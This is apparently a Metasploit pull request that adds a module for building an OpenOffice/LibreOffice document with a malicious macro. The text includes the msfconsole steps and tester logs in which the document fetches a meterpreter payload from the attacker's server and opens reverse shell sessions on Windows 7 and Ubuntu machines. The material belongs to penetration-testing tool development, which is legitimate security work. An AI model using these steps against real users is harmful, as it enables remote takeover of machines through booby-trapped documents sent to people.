### PR TITLE
Add exploit module for OpenOffice with a malicious macro

### PR DESCRIPTION
**Pull request by wchen-r7**
## Description

This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also
works against LibreOffice.

This was tested against the latest OpenOffice on Windows 7, and Ubuntu 16 running LibreOffice.

## Setup

By default, OpenOffice has a strict setting of macro security. Before testing this PR, make sure to:

1. To to Tools -> Options
2. Click on Security
3. Click on Macro Security
4. Change the Security Level to Medium or Low.

## Verification

An example of using this module against Windows:

- [x] Start msfconsole
- [x] ```use exploit/multi/misc/openoffice_document_macro```
- [x] ```set target 0```
- [x] ```set payload windows/meterpreter/reverse_tcp```
- [x] ```exploit```

An example of using this module against Linux or OSX (Ubuntu has LibreOffice by default, and you can use that too)

- [x] Start msfconsole
- [x] ```use exploit/multi/misc/openoffice_document_macro```
- [x] ```set target 1```
- [x] ```set payload python/meterpreter/reverse_tcp```
- [x] ```exploit```

## Demo

openoffice_macro_demo

### CODE REVIEW

File: documentation/modules/exploit/multi/misc/openoffice_document_macro.md [hunk 1]
```diff
@@ -0,0 +1,63 @@
+## Description
+
+This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also
+works against LibreOffice.
+
+For exploit successfully, the targeted user must adjust the security level in Macro Security to
```
Comment (bwatters-r7) [inline documentation/modules/exploit/multi/misc/openoffice_document_macro.md]: For the exploit to work successfully

File: documentation/modules/exploit/multi/misc/openoffice_document_macro.md [hunk 2]
```diff
@@ -0,0 +1,63 @@
...
+
+## Vulnerable Application
+
+* Apache OpenOffice
+* LibreOffice
+
+## Verification Steps
+
+To use this exploit, you must know the platform of the targeted user. The module supports either
+Windows, Linux, and OSX. If the target is using Windows, then the exploit will generate the macro
```
Comment (bwatters-r7) [inline documentation/modules/exploit/multi/misc/openoffice_document_macro.md]: The module supports Windows, Linux, and OSX.

File: documentation/modules/exploit/multi/misc/openoffice_document_macro.md (hunk 1 above)
Comment (wchen-r7) [inline documentation/modules/exploit/multi/misc/openoffice_document_macro.md]: Fixed, thanks!

File: documentation/modules/exploit/multi/misc/openoffice_document_macro.md (hunk 2 above)
Comment (wchen-r7) [inline documentation/modules/exploit/multi/misc/openoffice_document_macro.md]: Fixed. Thanks!

**Comment by bwatters-r7** [comment]
# Testing
## Setup
```
[ruby-2.3.3@metasploit-framework]((HEAD detached at upstream/pr/7934)) tmoose@ubuntu:~/rapid7/metasploit-framework$ uname -a
Linux ubuntu 4.4.0-59-generic #80-Ubuntu SMP Fri Jan 6 17:47:47 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
[ruby-2.3.3@metasploit-framework]((HEAD detached at upstream/pr/7934)) tmoose@ubuntu:~/rapid7/metasploit-framework$ git log | head -n 1
commit e1a1ea9d68715e5e612707d925cd74c3b4f1b9cb
```
## Windows 7x64 Pro SP1
```
msf exploit(handler) > use exploit/multi/misc/openoffice_document_macro 
msf exploit(openoffice_document_macro) > set target 0
target => 0
msf exploit(openoffice_document_macro) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(openoffice_document_macro) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(openoffice_document_macro) > set lport 4567
lport => 4567
msf exploit(openoffice_document_macro) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on <MSF_IP>:4567 
msf exploit(openoffice_document_macro) > [*] Using URL: http://0.0.0.0:8080/Cpp3uCywpYf8
[*] Local IP: http://<MSF_IP>:8080/Cpp3uCywpYf8
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: content.xml
[+] msf.odt stored at /home/tmoose/.msf4/local/msf.odt
[*] <Win7x64_IP>   openoffice_document_macro - Sending payload
[*] Sending stage (1189423 bytes) to <Win7x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win7x64_IP>:49390) at 2017-02-09 12:31:44 -0600

msf exploit(openoffice_document_macro) > sessions -l

Active sessions
===============

  Id  Type                     Information                                 Connection
  --  ----                     -----------                                 ----------
  1   meterpreter x64/windows  WIN-CMLEMCUFOB2\bwatters @ WIN-CMLEMCUFOB2  <MSF_IP>:4567 -> <Win7x64_IP>:49390 (<Win7x64_IP>)

msf exploit(openoffice_document_macro) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-CMLEMCUFOB2
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

```

## Ubuntu 16x64
```
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
```
```
msf exploit(handler) > use exploit/multi/misc/openoffice_document_macro
msf exploit(openoffice_document_macro) > set target 1
target => 1
msf exploit(openoffice_document_macro) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(openoffice_document_macro) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(openoffice_document_macro) > set lport 4567
lport => 4567
msf exploit(openoffice_document_macro) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on <MSF_IP>:4567 
msf exploit(openoffice_document_macro) > [*] Using URL: http://0.0.0.0:8080/DeLKKo
[*] Local IP: http://<MSF_IP>:8080/DeLKKo
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Linux/OSX (Python)...
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging directory: /home/tmoose/rapid7/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: content.xml
[+] msf.odt stored at /home/tmoose/.msf4/local/msf.odt
[*] <ubuntu_IP>   openoffice_document_macro - Sending payload
[*] Sending stage (38500 bytes) to <ubuntu_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <ubuntu_IP>:42984) at 2017-02-09 13:34:38 -0600

msf exploit(openoffice_document_macro) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017
Architecture : x64
Meterpreter  : python/linux
meterpreter > 
```

**Comment by bwatters-r7** [comment]
# Release Notes
This module adds the capability to create an Openoffice (or Libreoffice) document with a malicious macro that downloads and runs a [meterpreter] payload.

**Comment by wchen-r7** [comment]
Nice and smooth. Thanks for testing @bwatters-r7 !

**Pull request merged**